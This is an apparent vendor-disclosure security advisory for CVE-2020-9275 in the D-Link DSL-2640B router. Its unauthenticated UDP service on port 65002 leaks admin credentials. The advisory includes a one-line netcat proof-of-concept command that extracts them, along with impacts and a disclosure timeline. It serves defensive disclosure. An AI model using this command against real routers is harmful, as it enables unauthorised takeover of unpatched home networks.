Pulse Security Ltd - Security Advisory PSA-2020-001 D-Link DSL-2640B - Remote credentials exfiltration Advisory Information -------------------- Published: 2020-03-28 Version: 1.0 Manufacturer: D-Link Affected Model: DSL-2640B Hardware version: B2 Firmware version: ver.4.01 (Europe) Potentially affected: - DSL-2640B, HW version B3 - DSL-2641B Discovered by: Cristofaro Mune - Pulse Security Ltd Vulnerability Details --------------------- Class: CWE-522: Insufficiently protected credentials Public References: CVE-2020-9275 Platform: Successfully tested on D-Link DSL-2640B, HW version: B2, with the latest available firmware: EU_4.01B. Other models and/or firmware versions may be also affected. Background Information: D-Link DSL-2640B is an ADSL2/2+ router gateway that provides DSL, wireless, wired connectivity to local networks. The product has reached End-of-Life. No security patches or upgrades are provided by D-Link anymore. Summary: An issue was discovered on D-Link DSL-2640B B2 EU_4.01B devices. A cfm UDP service listening on port 65002 allows remote, unauthenticated exfiltration of administrative credentials. Details: The cfm process running on the device performs a large number of tasks related to router basic functionalities. Among the others, cfm listens on port UDP/65002, accepting unauthenticated commands that allow performing configuration tasks on the device. The format of such commands is as follows: Incoming commands are accepted, processed and responded to without any form of user authentication. The provided mac_address is checked for almost all incoming commands, with cmd_type="\x00\x01" being a notable exception. For cmd_type="\x00\x01", a minimum length of 10 bytes is required. Nonetheless, only the cmd_type specific value is required. The value of all the other fields is disregarded and can hold arbitrary values. By issuing such a command, the device responds by providing several information, including - Device MAC address - Admin username - Admin password - Local IP address The information provided would allow a remote attacker who is able to reach the router LAN IP address, to log into the router management interface and take complete control of the device. Same would apply for attackers able to reach the WAN interface IP address, if Remote Management is enabled. Proof-of-concept: python -c 'print("\x00\x01"* 5)' | nc -u 192.168.1.1 65002 ####MAC_ADDRESS#### Exploitability: The vulnerability is exploitable from any host connected to the LAN or WiFi interface. More in general, it may be exploitable by any attacker able to deliver UDP packets on port 65002 and read the response's content. Impacts: Remote extraction of sensitive information, such as credentials for logging into the management interface. Full device control can be obtained by a remote attacker able to issue UDP requests to the device Malicious firmware upload or changing security sensitive settings (e.g. DNS servers) can be achieved. Solutions & Workaround: Not available Additional Information ---------------------- Timeline (dd/mm/yy): 05/02/2020: Contacted D-Link 05/02/2020: Provided vulnerability details 05/02/2020: D-Link acknowledged receipt of the report 06/02/2020: D-Link "elevated the issues to R&D for investigation" 07/02/2020: Informed D-Link of planned disclosure at 30 days from initial contact, unless more time was required for a fix. 14/02/2020: Requested CVE to Mitre Root CNA 19/02/2020: Received assigned CVE from Mitre 22/02/2020: Communicated CVE number to D-Link. Status Update requested to D-Link. No response received 06/03/2020: Vulnerability publicly discussed at Nullcon 2020. 28/03/2020: This advisory.